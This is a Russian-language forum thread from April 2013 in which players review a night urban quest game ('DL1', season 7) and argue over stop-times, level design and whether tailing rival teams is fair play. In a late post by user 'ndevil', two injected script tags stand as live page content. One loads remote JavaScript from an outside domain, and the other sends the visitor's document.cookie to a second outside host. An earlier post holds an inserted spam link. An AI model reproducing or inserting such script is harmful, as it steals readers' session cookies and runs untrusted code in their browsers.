PDA

Просмотреть полную версию : DL1: 3-я игра 7-го сезона от Инигруппы TrueBlondies.


Ananke
06-04-2013, 08:42
Спасибо, что играли в нашу игру.
Сорри за косяки, мы действительно думали, что игра легкая :(

ВарENик
06-04-2013, 09:31
Спасибки за игру!!!
Осталась довольна))

Вопрос по поводу закурки Кооперативной улицы, у этого баяна адрес же по Токсовскому шоссе, смутило...

Ликерчики вкусняшки)))))

Спасибо за Лебедева, 35... Как ни странно, была на нем первый раз)

Сталкер приятный, но зачем писать код с внешней стороны здания напротив будки сторожа??

Лиса мимими)))

Рекламные плакатики поубегали(( а с подключением телевидения так и планировалось, что там не было адреса? Брался он по пути к Лужской...

Митя-бабушка милашка)) но джинсики палят))

ndevil
06-04-2013, 09:52
спасибо за игру. ликеры вкусняшки (хоть сейчас экипаж и начнет бухтеть про полуторочасовые стоптаймы :) и сон в <s>макдаке</s> оллис), лиса ок., заповедная, лебедева/мост - вошло (мост вошел особенно, новая шишка :) чето какаято печальная тенденция калечиться уже на второй игре подряд), раллийка по билбордам тоже в принципе ок., сталкер прикольный, смутило только то что в доезде было прописано КО2 и в результате пропиздоглазили один код, который и не думали даже внизу искать.
а вобще в целом от игры позитив и все понравилось, заканчивать экипажку в 8 утра - бесценно :)
Кстати, тут я покупаю бисер оптом (http://optbiser.ru) на перепродажу...

McLuck
06-04-2013, 10:20
Спасибо за подсказоньки с местом. За то, что дали доиграть - вообще уважуха. Полю зашло.

Экипаж не выдержал и разъехался, пришлось забирать на ветеранов доки от машины, забирать меня с работы с московской и брать последние 2 задания вдвоём(хотя одного хватило-бы). Доезды спасли немного.

Дом за постом ДПС - очень нехорошая подсказка. Нашли за 5 минут до слива, пока бежали и конечку искали - слили. Стоп-тайм - плохо

G1ZM0
06-04-2013, 11:00
Игра зашла! Спасибо, что дали доиграть!
Очень понравилось обилие кодов и их не задротность)
Коломяжский путепровод зашел, да и Заповедная..и лиса..и рекламные щиты..
Слегка подпортил динамику стоптайм в час с небольшим, но все-равно было весело:D
Отдельное спасибо всем игрокам, с которыми пересекались на уровнях... вы порой улыбаете:D
Огромное спасибо оргам! Пишите еще!

Jaguar
06-04-2013, 12:30
а в чем прикол заглушки которая до сих пор идет?

DEd_MONro
06-04-2013, 13:36
Прикольная динамичная игра, толь ко вот уровень с плакатами как то динамику подъубил нам. А так весело, задорно, но вот ликер мерзотные что капец)))) Даже пьющие у нас сказали что быстрее бы определили сорта водки)))

Grom
06-04-2013, 13:47
Лучше бы мы бухали всю ночь...
Чето я очень устал за всю ночь :( хотя в принципе ничего не делал...

Ananke
06-04-2013, 13:49
а в чем прикол заглушки которая до сих пор идет?

Я забыла авто переход поставить :( сорри. Сейчас доеду до дома, сниму не нужные уровни и начислю стоптаймы. Постараюсь к вечеру окончательную стату сделать.

Спасибо за отзывы, сорри за гигантские стоптаймы и поменяные в день игры 2 щита, в 8 вечера они еще были.
С телевидением мой косяк, не забила место, но этих щитов очень много в зоне было. Чтобы все были в равных условиях на игре ничего исправлять не стала.

Ol4ik
06-04-2013, 14:44
Спасибо за игру. Очень надеялись на блиц, а все как-то подрастянулось :(
Стоптайм печалька, реально не понимаю почему так долго все брали, вкусы очевиднее некуда :confused:
Один код на сталке на английском и вверхногами - адиво!
Странная закурка домику у поста ДПС.
Возможно, если б не был заранее заявлен блиц - позитива от игры было бы больше.

Митя, верни перчатки!!:)

Deneb
06-04-2013, 15:02
+первый уровень на лебедева
+второй на заповедной
+сталкер
-косяк с ко на сталкере
-перегоны ради нихуя
-поиски туалетов(хотя мож это и не минус, а мы какую то шляпу отгадали из задания)
-адски косячная раллийка, я плохо понимаю как так можно было накосячить в одном уровне.
-ну просто замечательный алкоуровень(который, я надеюсь, будет снят?)
-безумно интересная водонапорка на севере города, поняв что там один код, я туда даже не полез.
-боян в мурино. Зачем заигрывать говнодома ради одного кода? Ну заиграйте остановку ближайщую, если есть желание написать единичку. К остановке хоть пилить не надо.
-адова наебка с длительностью игры. Хорошо взял запасные батарейки, а ведь даже не собирался шпилить до утра. Ни взял ни рацию, ни заряженный телефон.
В общем спасибо за наебалово.

Создалось ощущение, что сначала вся игра была такая. В виде поиска туалетов и билбордов, а потом в авторы пришел кто то новый и появились два нормальных уровня вначале игры. Короче мне неясно как у таких опытных авторов получилось "это". Ну погоди была гораздо занятнее. Чего стоят только 8 часов зачистки дестроя.

areadna
06-04-2013, 15:59
меня вот тоже огорчила продолжительность - настроилась на блиц, в итоге продолжительность среднестандартная, местами подзатянуто, ну и стоптайм с ликерами не тру.

alectoNK
06-04-2013, 16:49
Спасибо за игру:-)
Первые уровни: пиво и бары - интересно. Жаль, что времени не хватило буквально на несколько кодов, в результате слив. Больше похоже на формат многоэкипажки с большим штабом.
Идея с ликерами отличная! Но нас убили стоптаймы. Мы ждали быструю игру, как и многие, а тут час ожидания, в результате вся команда во главе с водителем спит:-)

На сталкере: почему было написано КО2? Облазали там все, а оказалось, что бралось все элементарно, стоя на полу блин:-) В результате опять слив, не хватило пяти минут.

Лиса зачетная! Очень хотелось выпить стафф, но было нельзя, поэтому он остался жив, а так бы выпили и выбросили, совсем забыли, что стафф нужно привезти на финиш:-)

Optimist
06-04-2013, 16:50
А как лису нужно было опознать от других машин? Для тех кто не знает Стаса

Ananke
06-04-2013, 17:11
А как лису нужно было опознать от других машин? Для тех кто не знает Стаса

По пиву в окне.

Ananke
06-04-2013, 17:45
Мы с Митей хотим выразить отдельную благодарность в помощи при подготовке игры: Стасону, Зайцу, Сгу и Свете :)

DrDim777
06-04-2013, 18:05
Спасибо за игру !!
Нам все понравилось .))) даже покушать успели на стоп тайме))0

nadlooshi
06-04-2013, 22:44
Первая игра, где спать захотелось на первом же уровне.
Не зашло, простите.

Effa
06-04-2013, 23:06
Оч понравился первый уровень, нас на нем знатно вштырило) и еще шифровка с алкорасчлененками. В остальном - как-то странно, неровная динамика, во второй половине игры совсем заскучали.

И да, запрет на брутфорс усыпил половину нашего штаба((( даже традиционную зигу не вбить было(

ВарENик
07-04-2013, 00:56
чорд... это была алкорасчлененка... аааа.... круто.... мы тупые((

Ananke
07-04-2013, 01:57
Оч понравился первый уровень, нас на нем знатно вштырило) и еще шифровка с алкорасчлененками. В остальном - как-то странно, неровная динамика, во второй половине игры совсем заскучали.

И да, запрет на брутфорс усыпил половину нашего штаба((( даже традиционную зигу не вбить было(

не, ну зигу можно было вбить :) Запрет в основном распростронялся на первый уровень ну и на Ликеры :)

Подбирать коды на Заповедной бессмысленно... Хотя вроде кто-то пытался вбить Зенит после СКА :)

ВарENик
07-04-2013, 07:54
Добавьте что-ли кодик какой-нибудь в последний уровень, чтоб финишировать всем...

Ananke
07-04-2013, 09:53
Добавьте что-ли кодик какой-нибудь в последний уровень, чтоб финишировать всем...

я финишные протоколы всем сделала, сейчас сниму его нафиг :)

RAVE
07-04-2013, 10:29
+ спасибо за Лебедева и Заповедную, побывал там впервые)
+ Понравилась идея 1-го уровня
+ Понравилась лока для сталкера

- странная организация раллийки (выдача нового бонуса по времени, а не по закрытию предыдущего)
- стоптаймы
- несоответствие ожиданиям про длительность игры и кол-во алкоголя на игре.
- прописание доезда непосредственно перед локой (что мешает запомнить код доезда и пойти на уровень шариться там, где видишь конкурентов и вбить доезд только когда что-нибудь найдешь)

Но в целом игра понравилась. Спасибо!

Deneb
07-04-2013, 12:04
- прописание доезда непосредственно перед локой (что мешает запомнить код доезда и пойти на уровень шариться там, где видишь конкурентов и вбить доезд только когда что-нибудь найдешь)


ничего. Так некоторые и делали.

Кюхель
07-04-2013, 13:12
ничего. Так некоторые и делали.

Ой, а мы, честные, думали, что в дедлайне так нельзя:o.

prinncessa
07-04-2013, 13:24
Ой, а мы, честные, думали, что в дедлайне так нельзя:o.

Запишите в свой блокнотик))

Deneb
07-04-2013, 18:13
Ой, а мы, честные, думали, что в дедлайне так нельзя:o.

в этом лучшем из проектов в мире проекте, можно все что впрямую не запрещено правилами. И иногда можно даже то, что запрещено, но при условии что ты не палишься.

Jaguar
07-04-2013, 20:13
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу?

Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня.

Goy
07-04-2013, 20:37
Не было у них самолета. Просто выйдя со сталкера одновременно с нами, мы закрыли заглушку, а они нет. И сев нам на хвост, тем самым они выиграли около 10 минут, пройдя уровень по автопереходу. Когда они уже были у ключевой, задание для них только открылось.

DrevoReZ
07-04-2013, 20:40
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу?

Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня.
СПГ зачем-то вбили код снимаемого доезда и не уехали сразу со сталкера. Мы воспользовались ситуацией и пропаровозили их. По дороге в Парголово прошло время снимаемого доезда и пришло задание с коттеджем, так что на локу мы заходили уже на нужном уровне, таким образом, правил не нарушали. Не совсем фэирплэй конечно, но несколько гонок от преследователей на "Морозной свежести" и "Зимних забавах" показали, что для проекта это уже норма.
Запрещать паровозы правилами нет смысла, потому как доказать что было паровозом, а что смещением по зоне перед следующим уровнем нереально. Если хочется их на 100% избежать, орги могут использовать следующий проверенный способ: после задания "заглушка" вешается задание, в котором просят в ответ вбить название фирмы на рекламном щите рядом с залазом на локу, к примеру. И только после этого выдается задание коттедж. Любой паровоз получит двойную потерю времени от пропиленного за командой времени. Очень популярный прием на многих международках.

Ananke
07-04-2013, 20:42
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу?

Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня.

Меня тоже удивило это....
Но я как обычно всегда верю в честность игроков... но могу и перестать верить..
Сорри за задержку с открытием статы, со стоптамами и свободным временем тяжеловато... сегодня добью.

Jaguar
07-04-2013, 20:51
оке, понял. спасибо за ответ.

Velkopiterskij
07-04-2013, 21:03
СПГ зачем-то вбили код снимаемого доезда и не уехали сразу со сталкера. Мы воспользовались ситуацией и пропаровозили их.

Это пиздец. Можно мне сразу список всех возможных читов? А то я-то дурак, до сих пор по старым правилам играю.

DrevoReZ
07-04-2013, 21:27
Это пиздец. Можно мне сразу список всех возможных читов? А то я-то дурак, до сих пор по старым правилам играю.
Правила никогда не запрещали следить за конкурентами на доездах и локах, в той или иной мере каждая команда этим пользуется. Чем езда за конкурентами принципиально отличается от слежки за ними же на локе? Спалил код - молодец, а спалил куда ехать, получается не молодец, ататат.
Неприятно, когда тебя откровенно пропаравозили конкуренты или ты пол часа не мог найти код, а потом тебе пришла подсказка, и ты всем его спалил. Но это элемент игры и во власти оргов уменьшить риск возникновения подобных ситуаций.

Velkopiterskij
07-04-2013, 21:38
Правила никогда не запрещали следить за конкурентами на доездах и локах, в той или иной мере каждая команда этим пользуется. Чем езда за конкурентами принципиально отличается от слежки за ними же на локе? Спалил код - молодец, а спалил куда ехать, получается не молодец, ататат.
Неприятно, когда тебя откровенно пропаравозили конкуренты или ты пол часа не мог найти код, а потом тебе пришла подсказка, и ты всем его спалил. Но это элемент игры и во власти оргов уменьшить риск возникновения подобных ситуаций.

Древ, я по твоему предыдущему посту понял, что ты не считаешь это чем-то некорректным. Не считай. Твоё дело.
И не говори про "никогда". В ДЛ раньше было запрещено следить за конкурентами.

Grom
07-04-2013, 21:45
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))

Jaguar
07-04-2013, 21:50
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))

мы приехали, марк залез во внутрь, я снял доезд и мы его вбили, после чего я марку объяснял где искать код по фотке и он, вроде бы, раньше вас его снял.

Heckfy
07-04-2013, 22:17
Это ад, господа. Победа любой ценой становится нормой. Лучше быть в конце пилотона, но с чистой совестью!

Velkopiterskij
07-04-2013, 22:24
И ещё.
Не совсем фэирплэй конечно

Фэирплэй не бывает "не совсем". Или есть или нет.
но несколько гонок от преследователей на "Морозной свежести" и "Зимних забавах" показали, что для проекта это уже норма.
Странно, что вы так считаете. Мне кажется, что если есть мнение, что так делать не хорошо, то не стоит так делать в принципе. Да, обидно, что ты не можешь доказать, что были нарушения у соперников, когда точно в них уверен. Но это не повод нарушать самому. Мне так казалось.

Deneb
07-04-2013, 22:41
он, вроде бы, раньше вас его снял.
Нет, Тем. Кликникуэ сказал что они Марка еще и заадили там.

А на Морозной свежести Карась четко и внятно всем озвучил одно из условий игры. Паравозы там были официально разрешены, чем Котэ и пользовался. Западлянка конечно, но в пределах правил той игры(

Странный
07-04-2013, 22:47
Костик! Хватит ныть, какой же ты зануда...

Jaguar
07-04-2013, 22:51
Нет, Тем. Кликникуэ сказал что они Марка еще и заадили там.


Подробностей не знаю, не буду ничего утверждать, но точно рассказывал марку где кодюля по фотке.

Velkopiterskij
07-04-2013, 22:52
Костик! Хватит ныть, какой же ты зануда...

То есть тебе похуй на то, что такое происходит?

Goy
07-04-2013, 23:18
Да, обидно, что ты не можешь доказать, что были нарушения у соперников, когда точно в них уверен.

Не смешите меня - как будто кому-то когда-то что-то требовалось доказывать чтобы влепить штраф:)
Но речь не об этом. Речь о том, что нарушений правил Бабниками не было - мы сами ступили, что привели их на локу.

ndevil
07-04-2013, 23:20
а тем временем - че там со статой? хоть какая-нибудь предварительная будет? ее все еще так-же распи*орасило как и два дня назад.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

DrevoReZ
07-04-2013, 23:20
Костик! Хватит ныть, какой же ты зануда...
И я, и я =)

И не говори про "никогда". В ДЛ раньше было запрещено следить за конкурентами.
Открыл старую редакцию и нашел в ней упоминания только про запрет слежки за организаторами. Запрет слежки за конкурентами есть только в правилах точки отсчета. Можно ссылку?

"не совсем" фэирплей
Давай разберемся, что я имею ввиду под "не совсем" фэирплей, чтобы мои слова не перекручивали. Лично я считаю паровоз честным приемом и что так делать можно, аналогию с палевом конкурентов на локе я привел. Но в системе ценностей многих игроков проекта это не является честным приемом. Соответственно, в рамках проекта этот вопрос спорный и не может в полной мере называться фэирплеем.

Velkopiterskij
07-04-2013, 23:21
Не смешите меня - как будто кому-то когда-то что-то требовалось доказывать чтобы влепить штраф:)
Но речь не об этом. Речь о том, что нарушений правил Бабниками не было - мы сами ступили, что привели их на локу.

Я не говорил, что было нарушение правил. Уж Древ и Фомка в этом полне себе шарят. Когда я видел нарушение правил я сразу об этом прямо сказал.

Странный
07-04-2013, 23:22
То есть тебе похуй на то, что такое происходит?

про паровозы да ) на все 100% )) ибо каждые решают для себя что правильно что нет... и все мы знаем, кто за такой фигней был замечен... и их не так уж много, что бы обсуждать...

PS ты еще запаровозь )) тут такие водилы встречаются, хер это у тебя получится ))

Velkopiterskij
07-04-2013, 23:25
Открыл старую редакцию и нашел в ней упоминания только про запрет слежки за организаторами. Запрет слежки за конкурентами есть только в правилах точки отсчета. Можно ссылку?

Нет, нельзя, ибо у меня нет никаких старых редакций правил. Есть воспоминания об одном инциденте. Очень древнем, но он был.



Давай разберемся, что я имею ввиду под "не совсем" фэирплей, чтобы мои слова не перекручивали.
Для этого надо разобраться сперва что такое просто фэирплей.

Ananke
07-04-2013, 23:30
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?

DEd_MONro
07-04-2013, 23:32
Для этого надо разобраться сперва что такое просто фэирплей.

Это как инопланетяне - некоторые утверждают что имеют с ними дело или видели их, но по факту это все пока что какие то небылицы.

DEd_MONro
07-04-2013, 23:33
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?

Ну да))
Я вот уже писал про затирание кодов, а Ящер про игру на одной тачке))))))))

Velkopiterskij
07-04-2013, 23:33
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?
Пункт 3.4.2, пожалуй.

Кстати, видимо, нужны разъяснения по пункту 3.4.9, но это явно в другую тему писать надо.

Ananke
07-04-2013, 23:34
Ну да))
Я вот уже писал про затирание кодов, а Ящер про игру на одной тачке))))))))

Затирать код нельзя, это в правилах есть!

Grom
07-04-2013, 23:34
Нам нужно больше срааачааа!!1

Странный
07-04-2013, 23:35
Нам нужно больше срааачааа!!1

и крови )) го морды бить ))

Ananke
07-04-2013, 23:38
и крови )) го морды бить ))

А Го-то тут причем? :)

Jaguar
07-04-2013, 23:39
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?

проще снять и машинку на кирпичики...колеса на авито слить)))

Goy
07-04-2013, 23:40
Я не говорил, что было нарушение правил. Уж Древ и Фомка в этом полне себе шарят. Когда я видел нарушение правил я сразу об этом прямо сказал.

Да я как бы и не про Древа с Фомкой. Я как бы про другие личности. Думаю, ты знаешь о ком я говорю)

DEd_MONro
07-04-2013, 23:42
Давайте может хоть одну то игру в сезоне без кирпичей?

DrevoReZ
07-04-2013, 23:42
Для этого надо разобраться сперва что такое просто фэирплей.
Система ценностей, и она у каждого своя. Обсуждение за бутылочкой пива вполне подходящее, я считаю.

и крови )) го морды бить ))
Как-то незаметно Го под раздачу попал =)

Rada
07-04-2013, 23:43
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)

Velkopiterskij
07-04-2013, 23:45
Да я как бы и не про Древа с Фомкой. Я как бы про другие личности. Думаю, ты знаешь о ком я говорю)

Нет, я не знаю о ком ты говоришь.

DrevoReZ
07-04-2013, 23:47
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)
И тем не менее, на играх команды еще ни разу стенка на стенку не сходились, странно =)

Rada
07-04-2013, 23:48
И тем не менее, на играх команды еще ни разу стенка на стенку не сходились, странно =)

Есть версия, что все впереди. Метелить друг друга на выездах и прочих местах уже вошло в моду.

DrevoReZ
07-04-2013, 23:53
Есть версия, что все впереди. Метелить друг друга на выездах и прочих местах уже вошло в моду.
Говорят, что есть такой дядя - администратор проекта, который в любой внештатной ситуации спасет нас и примет адекватное решение =)

Ananke
07-04-2013, 23:57
Дорогие команды. Хочу пояснить как мы высчитывали бонусы за стоп-таймы на уровне ликер.
1. Берем время начала уровня
2. Берем время окончания уровня с учетом стоптайма
3. Смотрим во сколько реально закрыт технический уровень.
4. Если время закрытия технического уровня позднее, чем время в п.2, то начисление бонуса не производится, т.е. считается, что этот уровень был бы по любому слит.
5. Если время закрытия технического уровня ранее, чем время в п. 2, то начисляется бонус.
6. Технический уровень после всех манипуляций будет снят.

Ananke
07-04-2013, 23:58
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)

Это попадает под действие УК РФ.... Хотя порча чужого имущества тоже....

Странный
08-04-2013, 00:06
А Го-то тут причем? :)

не провоцируй )) а то опять в баню за ****** к Го отправят ))

Rada
08-04-2013, 00:12
Хотя порча чужого имущества тоже....
охраняемые сталкеры? :)

Странный
08-04-2013, 00:13
охраняемые сталкеры? :)

поехали...

ВарENик
08-04-2013, 00:42
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))

Я играла за эту команду, доезды вбивались как надо...
Так что - ???

Ananke
08-04-2013, 00:43
Если я правильно нажала все кнопки, то открыта статистика и доступен сценарий :)
Стоп-таймы начислены в соответствии со схемой описаной мною в сообщении № 68.

Grom
08-04-2013, 00:50
8сек разница это ад :)))

Варя, ну значит показалось. Все равно ничего не доказать. Полуфэйрплэй и окей.

Ната, спасибо за игру! Но в следующий раз честно напишите на сколько часов это будет :) и кол-во алко на команду :)

prinncessa
08-04-2013, 00:54
Если я правильно нажала все кнопки, то открыта статистика и доступен сценарий :)
Стоп-таймы начислены в соответствии со схемой описаной мною в сообщении № 68.
А комментарии какие-нибудь будут к сценарию?
Хотя на самом деле у меня один вопрос всего: где был туалет и как он курился?=)

ВарENик
08-04-2013, 00:57
Туалет на Жака Дюкло, заезд с Лиственной, за особняком..

Артур, бывает))))

prinncessa
08-04-2013, 00:59
Туалет на Жака Дюкло, заезд с Лиственной, за особняком..

А откуда это следует? И как его искать если о нем не знаешь?

ВарENик
08-04-2013, 01:02
Мимими... Я его прекрасно знаю... Я простите влезла, ответила на первую половину вопроса))

prinncessa
08-04-2013, 01:07
Мимими... Я его прекрасно знаю... Я простите влезла, ответила на первую половину вопроса))
Ну вот я все-таки от Наташи ответа хочу дождаться.
Потому что пока, даже понимая где он примерно, я не понимаю как его найти. )

Grom
08-04-2013, 01:08
Артур, бывает))))
Это все мои старые комплексы! Оохх...

ВарENик
08-04-2013, 01:11
Ну вот по этому и извиняюсь))) на вторую половину вопроса Наточка ответит уже)))

ВарENик
08-04-2013, 01:13
Это все мои старые комплексы! Оохх...

Не комплексуй)))

DEd_MONro
08-04-2013, 01:13
Туалет заброс Жака Дюкло 20 - если не ошибаюсь то именно это курилось из картинки

ВарENик
08-04-2013, 01:15
Он рядом с 62 домом) точно не 20))

Effa
08-04-2013, 01:16
Ну вот я все-таки от Наташи ответа хочу дождаться.
Потому что пока, даже понимая где он примерно, я не понимаю как его найти. )Насколько я поняла из коце, никак.
Я знала, что там есть толчок, из недельки Ситрона и пешеходки по Сосновке (обе - игры Энки в 2010 году). Но ни на одной карте (и на Викимапии) его нет, поэтому когда мы ставили точку, мою версию про этот толчок сразу зарубили и отправили поле на пересечение со Светлановским (там есть другой туалет и он отмечен на картах, но он не подходил). Потом все-таки поняли, что надо ехать севернее, но это было уже под слив.

Кюхель
08-04-2013, 01:38
А откуда это следует? И как его искать если о нем не знаешь?

Вот как было у нас (можем хвастануться, ибо больше нечем:rolleyes:).

На картинке к заданию вверху "Дюкло", а внизу среди напитков вдруг "Tualet zabros" (английским транслитом). А поскольку "Дюкло" лишь отдалённо похоже на ругательство (ах ты, Дюкло!), но при этом ни одного алкогольного напитка с названием "Tualet zabros" я не встречал (даже "волшебный" Gilpin Family Whisky - бррррррррр - не содержит в себе это слово=), имеем, куда ехать.

Собственно, в 1000 ml (бутыль) в 20 раз больше, чем в 50 ml (стопарь), и по стоимости бьется, потому 20. Вбиваем тупо (куда-нибудь, кроме движка) и ищем туалет на районе (у меня esosedi буквально первой ссылкой или второй вылезли). Там он один... Это даже, не зная стрельбища на Дюкло...

Почему-то при разгадывании задания вспоминался DLmini и Го, и только по хорошему поводу;).

Grom
08-04-2013, 01:54
Как хорошо, что вы в нашей команде на бДЛ :))))))

Кюхель
08-04-2013, 02:01
Как хорошо, что вы в нашей команде на бДЛ :))))))

Ну если там сортиры будут...
По-моему, очень логично, что команда из нижней части таблицы угадывает именно туалеты:o.

Grom
08-04-2013, 02:03
Ну если там сортиры будут...
По-моему, очень логично, что команда из нижней части таблицы угадывает именно туалеты:o.

Думаю не так долго осталось до разгадывания вышек и башен ;)

prinncessa
08-04-2013, 08:04
Вот как было у нас (можем хвастануться, ибо больше нечем:rolleyes:).

Я глупая.
В итоге, каким запросом и куда он находился?)

И да, +1 к Грому-)

Jaguar
08-04-2013, 09:09
мы прокатились по всей улице..и его заметили)

Ananke
08-04-2013, 09:34
А комментарии какие-нибудь будут к сценарию?
Хотя на самом деле у меня один вопрос всего: где был туалет и как он курился?=)

Комментарии будут сегодня вечером.

DashИК
08-04-2013, 11:07
+ на 9 часов игры пара хороших мест, пара нормальных заданий и пара уровней, которые отражают тему игры...
- бессмысленные перегоны;
- говнодома (ну вот совсем говно);
- очень длинный стоп-тайм, убивший динамику;
- большое кол-во оргкосяков - (отсутствие/неверно указанные КО, странные доезды, неверно оцененное время игры и т.д.).

Наверно, в целом игра неплохая, но от Наты и Блондисов я лично ожидала большего.

Tvaruga
08-04-2013, 12:10
СПГ зачем-то вбили код снимаемого доезда и не уехали сразу со сталкера. Мы воспользовались ситуацией и пропаровозили их. По дороге в Парголово прошло время снимаемого доезда и пришло задание с коттеджем, так что на локу мы заходили уже на нужном уровне, таким образом, правил не нарушали. Не совсем фэирплэй конечно, но несколько гонок от преследователей на "Морозной свежести" и "Зимних забавах" показали, что для проекта это уже норма.
Запрещать паровозы правилами нет смысла, потому как доказать что было паровозом, а что смещением по зоне перед следующим уровнем нереально. Если хочется их на 100% избежать, орги могут использовать следующий проверенный способ: после задания "заглушка" вешается задание, в котором просят в ответ вбить название фирмы на рекламном щите рядом с залазом на локу, к примеру. И только после этого выдается задание коттедж. Любой паровоз получит двойную потерю времени от пропиленного за командой времени. Очень популярный прием на многих международках.

Древ, не ожидал от тебя

AmakaN
08-04-2013, 13:49
Спасибо за игру!

1. Понравился первый уровень. Хотя нашли много меню баров, где был указан Эдельвейс и еще что-то, а движок такие коды не проходили. Было страшно за переборы =)
2. понравилась закурка "алко-расчлененка"
3. не понял смысла доезда до туалета в Сосновке. Если бы не знали, что он там есть - слили бы
4. дуаль с кооперативом и т.п. - есть гаражный кооператив Школьная-21 (только церковь было не привязать, хотя возможно, она там рядом где-то есть)
5. не понравилось то, что та информация, которая была на форуме изначально и появлялась в процессе, собственно на игре больше дезинформировала (количество уровней, длительность игры, количество кодов, количество алкоголя и т.д.)

В целом понравилось, было бы покороче чуть-чуть... :rolleyes:

Жаль, что вводится негласное правило "все ради победы"...

Странный
08-04-2013, 14:35
что там со снятием уровня?

Тэ.
08-04-2013, 15:14
Спасибо за игру!

1. Понравился первый уровень. Хотя нашли много меню баров, где был указан Эдельвейс и еще что-то, а движок такие коды не проходили. Было страшно за переборы =)
2. понравилась закурка "алко-расчлененка"
3. не понял смысла доезда до туалета в Сосновке. Если бы не знали, что он там есть - слили бы
4. дуаль с кооперативом и т.п. - есть гаражный кооператив Школьная-21 (только церковь было не привязать, хотя возможно, она там рядом где-то есть)
5. не понравилось то, что та информация, которая была на форуме изначально и появлялась в процессе, собственно на игре больше дезинформировала (количество уровней, длительность игры, количество кодов, количество алкоголя и т.д.)

В целом понравилось, было бы покороче чуть-чуть... :rolleyes:

Жаль, что вводится негласное правило "все ради победы"...

Истинный дзен. Мне еще расти и расти.

Deneb
08-04-2013, 15:25
зачем тебе дзен, Аня? Больше ненависти!)

Jaguar
08-04-2013, 15:33
что там со снятием уровня?

каким?))

Странный
08-04-2013, 15:40
каким?))

где орги код сливали командам, что б долго после стоп тайма не рыскали...

Jaguar
08-04-2013, 15:43
где орги код сливали командам, что б долго после стоп тайма не рыскали...

подробности) что за уровень? кому чо слили?

Странный
08-04-2013, 15:43
подробности) что за уровень? кому чо слили?

а это тебе орги сейчас расскажут...

Ananke
08-04-2013, 17:32
В связи с тем, что технический уровень после уровня Ликер можно было закрыть только кодом, то при сливе остаточного времени после стоп-тайма, командам показывался код уровня, чтобы они ехали дальше. Это были команды Р4 и Бабники.

prinncessa
08-04-2013, 17:44
В связи с тем, что технический уровень после уровня Ликер можно было закрыть только кодом, то при сливе остаточного времени после стоп-тайма, командам показывался код уровня, чтобы они ехали дальше. Это были команды Р4 и Бабники.
а за что тогда у Бабников стоп-тайм, если уровень все равно слит?

AmakaN
08-04-2013, 17:44
и почему у них нет штрафа за слитый уровень?

Странный
08-04-2013, 17:58
а вот теперь самое веселое ))

Ananke
08-04-2013, 18:01
и почему у них нет штрафа за слитый уровень?

на этом уровне не было штрафов за слив.

Rada
08-04-2013, 18:03
и почему у них нет штрафа за слитый уровень?
видимо потому, что уровень технический.

prinncessa
08-04-2013, 18:04
на этом уровне не было штрафов за слив.
Так а бонус-то за что у Бабников?

Ananke
08-04-2013, 18:08
http://s019.radikal.ru/i612/1304/ad/d8e0af894b7d.jpg (http://www.radikal.ru)

Ananke
08-04-2013, 18:08
Так а бонус-то за что у Бабников?

убрала, случайно начислила. Сейчас еще раз все бонусы проверю.

DrK
08-04-2013, 18:36
Это новая фишка сезона такая - заворачивать статистику в бараний рог. :)
*пошел дальше*

prinncessa
08-04-2013, 20:52
Это новая фишка сезона такая - заворачивать статистику в бараний рог. :)
*пошел дальше*
это было принято на последнем СК, просто написать забыли =)

5M
09-04-2013, 08:20
где орги код сливали командам, что б долго после стоп тайма не рыскали...

Это неверная трактовка действий агентов. Наташа уже всё пояснила.

На уровне "Ликеры" были оставлены перчатки и фонарь. Перчатки чьи знаю, а про фонарь кто-то говорил, но я не помню кто именно. Владелец, отзовись.
Верну всё на брифе БДЛ или пишите в личку, можно раньше где либо пересечься.

Jaguar
09-04-2013, 08:45
погодите, я чего-то не понимаю если команда долго не могла взять уровень с ликерами, то ей давался код? она вбивала и ехала дальше.

Ananke
09-04-2013, 08:48
погодите, я чего-то не понимаю если команда долго не могла взять уровень с ликерами, то ей давался код? она вбивала и ехала дальше.

Да, иначе технический уровень было не закрыть, код давался после нахождения команды на уровне Ликер с учетом стоп-тайма более 45 минут.

Кюхель
09-04-2013, 17:35
От игры получил массу непередаваемых эмоций, волею судеб обнаружив себя в единственном числе в комнате (а точнее, на кухне), ставшей для меня штабом.

Первое задание - не знаю, как кому, но мне было адово круто. Чуть больше прухи, и мы бы взяли весь бонус, но в итоге - спасибо и на этом. Вбивание чукчи на последних истекающих секундах сделало мой день. Аккурат после этого всё вырубилось:).

Когда врубилось: запомнились туалет, Мурино и, конечно, "ралли", в котором один щит был взят единственночислым кухонным штабом (хехе), а угаданный другой он же тупо не успел вбить на истекающем времени.

Не понравился более-чем-часовой стоптайм. Сидеть в другом городе, имея необходимость вставать в 7 утра, и чего-то ждать, тупо. Спасибо нуге и зеленому чаю за этот час.

В целом твёрдый зачёт с ололо и присвистом:o.

P.S. Хочу откомментировать ситуацию с доездами. Поясните, чем ментально отличаются "паровоз" и проблема с прошлой игры, когда кто-то кому-то блокировал лису. Со стороны так: обе проблемы ведут одному и тому же (кто-то получает нечестное преимущество), обе сопряжены с риском на дороге.

Effa
